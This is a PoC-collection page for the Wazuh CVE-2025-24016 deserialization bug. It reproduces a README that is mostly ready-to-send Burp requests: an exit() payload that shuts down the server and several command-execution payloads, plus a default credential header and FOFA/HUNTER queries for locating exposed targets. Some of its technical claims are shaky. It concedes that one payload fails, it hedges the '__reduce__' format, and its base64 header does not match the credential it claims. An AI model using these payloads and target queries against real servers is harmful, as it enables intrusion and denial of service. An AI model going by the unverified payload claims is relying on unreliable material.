关联漏洞
标题:
Wazuh 代码问题漏洞
(CVE-2025-24016)
描述:Wazuh是Wazuh开源的一个应用软件。用于收集,汇总,索引和分析安全数据,帮助组织检测入侵,威胁和行为异常。 Wazuh 4.4.0至4.9.1之前版本存在代码问题漏洞,该漏洞源于分布式API的不安全反序列化,允许攻击者实现远程代码执行。
描述
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
介绍
🚨 Wazuh Remote Code Execution (RCE) - PoC
### 📌 Vulnerability Summary
>A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
🔍 **Details**
>The flaw lies in the Wazuh API's DistributedAPI, where user-controlled input is unsafely deserialized. This allows attackers with API access (e.g., compromised dashboard or cluster node) to execute arbitrary Python code on the master server using the run_as endpoint.
📬 **Proof of Concept (Burp Request)**
```
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
```
📌 The Authorization header is the base64 of `wazuh-wui:MyS3cr37P450r.*-`.
📌 The payload causes the Wazuh server to shut down by calling Python's `exit()` method.
💥 **Impact**
- Full Remote Code Execution via the API
- Server Shutdown in PoC (DoS)
- Risk of lateral movement across Wazuh clusters
🛡️ Mitigation
- ✅ Upgrade to Wazuh v4.9.1 or higher
- 🚫 Avoid exposing the API externally
- 🧪 Monitor unusual API activity
### ✅ Example Payload to Run whoami
```
{
"__unhandled_exc__": {
"__class__": "os",
"__import__": "os",
"system": "whoami"
}
}
```
But this alone won’t work unless the deserialization code actually executes the object tree. Instead, use a `__reduce__` based object that executes code.
Here’s the working format for a **Burp request** using Python’s `os.system()` via pickle-like logic:
💣 **Working Burp RCE Payload (Python Code Execution)**
```
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json
{
"__reduce__": [
"__import__('os').system",
["whoami"]
]
}
```
🧬 **To run ls, change payload:**
```
{
"__reduce__": [
"__import__('os').system",
["ls -la"]
]
}
```
You can also use:
```
{
"__reduce__": [
"__import__('subprocess').getoutput",
["id"]
]
}
```
⚠️ Note: The actual deserialization must happen with `eval()` or similar mechanisms in the backend for this to work. Based on the Wazuh PoC, this is indeed possible if you control auth_context.
🔐 Pro Tip
Intercept the request in Burp, go to the Repeater tab, and test multiple payloads like:
- `"whoami"`
- `"id"`
- `"uname -a"`
- `"ls /home/wazuh"`
👇Query
- HUNTER : `product.name="Wazuh"`
- FOFA : `app="Wazuh"`
If the response is **empty** or status is **500**, check logs — **sometimes output isn’t returned.**
📚 Stay **sharp**, **hackers**! More **bug bounty PoCs**, **bypasses**, and **payloads** are coming!
Follow 👉 [@cybersecplayground](https://t.me/cybersecplayground) for daily hacking content!
> #bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit
文件快照
[4.0K] /data/pocs/7a0130c576062f15fcfa81629f7392e49266ed4a
├── [1021] CVE-2025-24016-POC.py
├── [1.1K] LICENSE
└── [3.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。